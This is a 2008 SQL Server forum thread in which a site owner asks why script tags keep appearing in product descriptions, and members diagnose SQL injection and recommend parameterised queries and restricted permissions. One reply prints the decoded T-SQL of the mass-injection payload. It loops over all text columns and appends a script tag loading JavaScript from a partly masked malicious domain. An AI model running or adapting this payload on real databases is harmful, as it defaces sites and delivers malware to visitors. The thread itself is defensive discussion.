| Author |
 Topic  |
|
Rob K
Starting Member
United Kingdom
9 Posts |
 Posted - 05/13/2008 : 07:52:02
|
I have a ASP website that uses SQL 2005.
For the last 2 nights someone has hacked the DB and added a url with a script to the end of my product descriptions, the script is located on another server which is infected with viruses.
For example, a field should read 'Clothing', when it gets hacked it reads 'Clothing <Script... blah blah here>'
I have restored the DB each time but I cannot find how they are doing this, the windows Firewall is blocking any ext SQL connections so I am guessing there is something local that is doing this.
Any ideas where to look for clues?
Thanks.
|
|
|
harsh_athalye
Flowing Fount of Yak Knowledge
India
5509 Posts |
Posted - 05/13/2008 : 07:53:29
|
SQL Injection will be my first guess.
Harsh Athalye
India.
"The IMPOSSIBLE is often UNTRIED" |
 |
|
|
Rob K
Starting Member
United Kingdom
9 Posts |
Posted - 05/13/2008 : 08:05:49
|
quote:
Originally posted by harsh_athalye
SQL Injection will be my first guess.
Harsh Athalye
India.
"The IMPOSSIBLE is often UNTRIED"
Ok, not being a SQL expert, can you help me out here, where would I look to find if that is it? |
|
|
|
harsh_athalye
Flowing Fount of Yak Knowledge
India
5509 Posts |
|
|
Rob K
Starting Member
United Kingdom
9 Posts |
Posted - 05/13/2008 : 08:17:04
|
| Ok, thanks v much for that. |
|
|
|
Rob K
Starting Member
United Kingdom
9 Posts |
Posted - 05/13/2008 : 09:57:30
|
| If it is a SQL injection, would that be in a log somewhere? |
|
|
|
pootle_flump
Flowing Fount of Yak Knowledge
United Kingdom
1064 Posts |
Posted - 05/13/2008 : 11:51:33
|
| Not in any form that you can read as it is. The problem with SQL Injection is that by definition it is not recognised by SQL Server as malicious. If you are concatenating user input into SQL statements for execution then you can be pretty confident this has been done by SQL Injection. |
|
|
|
nheidorn
Starting Member
USA
28 Posts |
|
|
Rob K
Starting Member
United Kingdom
9 Posts |
Posted - 05/13/2008 : 12:38:40
|
| Great, I have blocked the IP's mentioned on that link. |
|
|
|
GilaMonster
Flowing Fount of Yak Knowledge
South Africa
4507 Posts |
Posted - 05/14/2008 : 02:36:08
|
If you want to protect yourself against SQL injection, use only stored procedures to access the DB. Use parameterised calls in your ASP code. Don't concatenate SQL statements and execute them.
Restrict your database user to have only execute permissions on the stored procs and nothing else.
--
Gail Shaw |
|
|
|
SwePeso
Patron Saint of Lost Yaks
Sweden
29138 Posts |
Posted - 05/14/2008 : 02:56:00
|
Where is the post Jeff made where he dissection the binary string into t-sql?
E 12°55'05.25"
N 56°04'39.16" |
|
|
|
GilaMonster
Flowing Fount of Yak Knowledge
South Africa
4507 Posts |
Posted - 05/14/2008 : 03:58:44
|
quote:
Originally posted by Peso
Where is the post Jeff made where he dissection the binary string into t-sql?
If you find it, I'd very much like to see it.
--
Gail Shaw |
|
|
|
SwePeso
Patron Saint of Lost Yaks
Sweden
29138 Posts |
Posted - 05/14/2008 : 04:16:05
|
I remember it was something about
SELECT * FROM INFORMATION_SCHEMA.COLUMNS WHERE Type IN ('VARCHAR', 'CHAR', 'TEXT')
E 12°55'05.25"
N 56°04'39.16" |
|
|
|
SwePeso
Patron Saint of Lost Yaks
Sweden
29138 Posts |
Posted - 05/14/2008 : 04:23:40
|
The cleartext code looked similar to thisDECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.211796*.net/f****p.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
E 12°55'05.25"
N 56°04'39.16" |
|
|
|
SwePeso
Patron Saint of Lost Yaks
Sweden
29138 Posts |
|
|
GilaMonster
Flowing Fount of Yak Knowledge
South Africa
4507 Posts |
Posted - 05/14/2008 : 05:00:52
|
Hmm. SQL Injection and XSS all in one. Interesting.
Not close to as damaging as it could have been.
--
Gail Shaw |
|
|
|
SwePeso
Patron Saint of Lost Yaks
Sweden
29138 Posts |
Posted - 05/14/2008 : 05:07:13
|
I agree.
The attack could have encrypted all columns!
I hope this learns all newbies, noobs and beginners to NEVER EVER concatenate string to send to database.
Always use parametrized queries as a first line of defence.
E 12°55'05.25"
N 56°04'39.16" |
|
|
|
Byapti
Starting Member
1 Posts |
|
|
SwePeso
Patron Saint of Lost Yaks
Sweden
29138 Posts |
Posted - 05/14/2008 : 06:03:24
|
Is it really "a vulnerability at database layer"?
The database is just performing what front-end application tells it to.
E 12°55'05.25"
N 56°04'39.16" |
|
|
|
GilaMonster
Flowing Fount of Yak Knowledge
South Africa
4507 Posts |
Posted - 05/14/2008 : 07:47:36
|
quote:
Originally posted by Peso
I hope this learns all newbies, noobs and beginners to NEVER EVER concatenate string to send to database.
Always use parametrized queries as a first line of defence.
Considering all the posts here and on Central in the last couple weeks, I somehow doubt it.
--
Gail Shaw |
Edited by - GilaMonster on 05/14/2008 08:04:28 |
|
|
|
harsh_athalye
Flowing Fount of Yak Knowledge
India
5509 Posts |
Posted - 05/14/2008 : 07:59:37
|
Only experience can teach them then! 
Harsh Athalye
India.
"The IMPOSSIBLE is often UNTRIED" |
|
|
|
Topic |
|
SQL Keeps gatting hacked
